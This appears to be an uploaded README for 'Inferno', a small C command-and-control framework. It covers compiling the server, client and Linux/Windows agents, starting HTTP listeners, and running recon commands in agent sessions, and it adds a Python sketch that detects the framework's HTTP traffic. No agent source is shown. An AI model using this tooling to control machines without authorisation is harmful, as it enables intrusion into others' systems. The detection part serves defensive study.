C 2

The document describes the functionalities and commands of the Cortex Security (CS) C2 system, which operates over TCP and HTTP. It provides detailed instructions on compiling the server and client, starting sessions, and executing commands within those sessions. Additionally, it highlights the ability to manage HTTP listeners and agents for both Linux and Windows systems, while noting some drawbacks such as an outdated readme.

Uploaded by

elobf7114

Note

"Exploring the digital realm through C feels like journeying through the fiery
depths of Inferno with nothing but a trusty torch in hand. It's not just coding;
it's an adventure, where every line of C unlocks a new door to discovery in the
digital underworld."

Cortex Security (CS) C2


Client/Server channel over TCP
Server/Agent channel over HTTP
Listing HTTP listeners
Starting HTTP listeners
Stopping HTTP listeners
Listing HTTP sessions
Entering HTTP sessions
Destroying HTTP sessions
Switching sessions
Linux agent
Windows agent
Architecture
Inferno Architecture

Supported commands
Mode             Command    Example             Description
====             =======    =======             ===========
HELP             help       /                   Show help menu
EXIT             exit       /                   Exit C2
LIST listeners   listeners  /                   List active listeners
START listener   http       http 127.0.0.1 80   Start an HTTP listener
STOP listener    stop       stop http 1         Stop the HTTP listener with ID 1
LIST sessions    sessions   /                   List active sessions
ENTER session    enter      enter 1             Enter the session with ID 1
DESTROY session  kill       kill 1              Destroy the session with ID 1

Supported session commands
Mode              Command   Description
====              =======   ===========
EXIT              exit      Exit session
WHOAMI            whoami    Get user login
HOSTNAME          hostname  Get machine hostname
LIST              ls        List files
DIRECTORY         pwd       Print current directory
CHANGE DIRECTORY  cd        Change the current directory

Some commands can be run with arguments.

Manual
Compiling instructions
Navigate to the project directory and run:

gcc client.c -o client
gcc server.c -o server
gcc devil-lin.c -o devil-lin
i686-w64-mingw32-gcc -o devil-win.exe devil-win.c -lws2_32
More devil-lin with different ports 80, 8080, 8000 etc

Utilisation instructions
First you will need to start the server

┌──(asx㉿asx)-[~/Inferno]
└─$ ./server
Initializing socket...
Binding socket to Inferno address...
Listening to 127.0.0.1:33333
Accepting client...
Starting the server

Once the server is started it will listen on port 33333. Now you can start the
client

┌──(asx㉿asx)-[~/Inferno]
└─$ ./client

_ <-. (`-')_ (`-') _ (`-') <-. (`-')_


(_) \( OO) ) <-. ( OO).-/<-.(OO ) \( OO) ) .->
,-(`-'),--./ ,--/(`-')-----.(,------.,------,),--./ ,--/ (`-')----.
| ( OO)| \ | |(OO|(_\---' | .---'| /`. '| \ | | ( OO).-. '
| | )| . '| |)/ | '--. (| '--. | |_.' || . '| |)( _) | | |
(| |_/ | |\ | \_) .--' | .--' | . .'| |\ | \| |)| |
| |'->| | \ | `| |_) | `---.| |\ \ | | \ | ' '-' '
`--' `--' `--' `--' `------'`--' '--'`--' `--' `-----'

Info: X joined session


[>] Initializing socket...
[+] Socket initialized
[>] Connecting to server...
[+] Connected to server

[ASX]@[INFERNO]>
Starting the client

You will see the connection is accepted. Now you can start an HTTP listener on port
80

[ASX]@[INFERNO]> http 192.168.1.40 8080


[+] Result:
HTTP/1.0 200 OK
Starting an HTTP listener on port 8080

Let's start another listener on port 80.

[ASX]@[INFERNO]> http 192.168.1.40 80


[+] Result:
HTTP/1.0 200 OK
Starting another HTTP listener on port 80

Now we will list active listeners

[ASX]@[INFERNO]> listeners
[+] Result:
ID PROTOCOL ADDRESS PORT
== ======== ======= ====
1 http 192.168.1.40 8080
2 http 192.168.1.40 80
Listing our listeners

You can launch an agent by the following command:

┌──(asx㉿asx)-[~/Inferno]
└─$ ./devil-lin8080
Initializing socket...
Connecting...
Connected
Starting a Linux agent

We can list our sessions

[ASX]@[INFERNO]> sessions
[+] Result:
ID COMMUNICATION REMOTE ADDRESS
== ============= ===========
1 http 192.168.1.40 8080
Linux session is ready

Now we can also launch a Windows agent:

PS C:\Users\Administrator> ./a.exe
Hello ASX
Initializing socket...
Connecting...
Connected
Starting Windows agent

We can list the sessions to see if the Windows session joined

[ASX]@[INFERNO]> sessions
[+] Result:
ID COMMUNICATION REMOTE ADDRESS
== ============= ===========
1 http 192.168.1.40 8080
2 http 192.168.1.40 80
Both the Linux and Windows sessions are there, showing their remote addresses

Now you can enter a session to interact with an agent. Let's start with the Windows one.

[ASX]@[INFERNO]> enter 2
[+] Result:
XXX
[+] Entering session
Entering the Windows session

We will send multiple commands: whoami

[ASX]@[SESSION]> whoami
[>] Sending 6 bytes to server...
[>] Receiving 15 bytes from server...
[+] Result:
Administrator

[ASX]@[SESSION]>
pwd

[ASX]@[SESSION]> pwd
[>] Sending 3 bytes to server...
[>] Receiving 24 bytes from server...
[+] Result:
C:\Users\Administrator

[ASX]@[SESSION]>
hostname

[ASX]@[SESSION]> hostname
[>] Sending 8 bytes to server...
[>] Receiving 17 bytes from server...
[+] Result:
WIN-KIIR8T1ORA6

[ASX]@[SESSION]>
Now it's time to send commands from Linux

[ASX]@[SESSION]> exit
[>] Sending 4 bytes to server...

[ASX]@[INFERNO]>
[ASX]@[INFERNO]> enter 1
[+] Result:
XXX
[+] Entering session
[ASX]@[SESSION]> whoami
[>] Sending 6 bytes to server...
[>] Receiving 5 bytes from server...
[+] Result:
asx

[ASX]@[SESSION]>
It's now time to exit Inferno

[ASX]@[INFERNO]> exit
[>] Exiting Inferno...
[+] Exited
Exiting C2

Drawbacks
Note

Readme not updated to latest

Infos
Tip

You can analyze the content of the payload sent and received

==========START PAYLOAD==========
Receiving from client:
POST /endpoint HTTP/1.0
Host: inferno.com
Content-Type: application/json
Content-Length: 20
Connection: close

{'payload':'whoami'}
Sending to agent:
POST /endpoint HTTP/1.0
Host: inferno.com
Content-Type: application/json
Content-Length: 20
Connection: close
{'payload':'whoami'}
Received from agent: asx
Sending to client: asx
===========END PAYLOAD===========
Analyzing payload in server message
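
For defenders, the request logged above has several traits that can be matched in proxy logs or packet captures: a POST to /endpoint over HTTP/1.0, the Host value inferno.com, and a body declared as application/json that is single-quoted and therefore not valid JSON. The following detection sketch is an added example, not part of the Inferno project; the trait names, the threshold of two traits and the sample requests are assumptions constructed from the log shown on this page.

```python
import json

# Constructed sample requests (not captured traffic). The first copies the
# request shape shown in the server log above; the second is ordinary JSON.
SAMPLES = [
    b"POST /endpoint HTTP/1.0\r\nHost: inferno.com\r\n"
    b"Content-Type: application/json\r\nContent-Length: 20\r\n"
    b"Connection: close\r\n\r\n{'payload':'whoami'}",
    b"POST /api/v1/items HTTP/1.1\r\nHost: shop.example\r\n"
    b"Content-Type: application/json\r\nContent-Length: 15\r\n\r\n"
    b'{"name":"book"}',
]

def parse_request(raw):
    """Split a raw HTTP request into (method, path, version, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) != 3:
        raise ValueError("not an HTTP request line")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], parts[2], headers, body

def findings(raw):
    """Return the traits a request shares with the payload logged on this page."""
    method, path, version, headers, body = parse_request(raw)
    hits = []
    if (method, path, version) == ("POST", "/endpoint", "HTTP/1.0"):
        hits.append("post-endpoint-http10")
    if headers.get("host") == "inferno.com":
        hits.append("host-inferno")
    if headers.get("content-type", "").startswith("application/json"):
        try:
            json.loads(body.decode("utf-8"))
        except ValueError:  # covers JSONDecodeError and invalid UTF-8
            hits.append("json-type-invalid-body")
    if body.lstrip().startswith(b"{'payload':"):
        hits.append("single-quoted-payload-key")
    return hits

def is_suspicious(raw, threshold=2):
    # Each trait is weak alone; require several together to limit false positives.
    return len(findings(raw)) >= threshold

if __name__ == "__main__":
    for sample in SAMPLES:
        print(findings(sample), is_suspicious(sample))
```

The Host header and path are trivially changed by an operator, so the mismatch between the declared content type and the unparseable body is the more durable of these signals.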

End of transmission
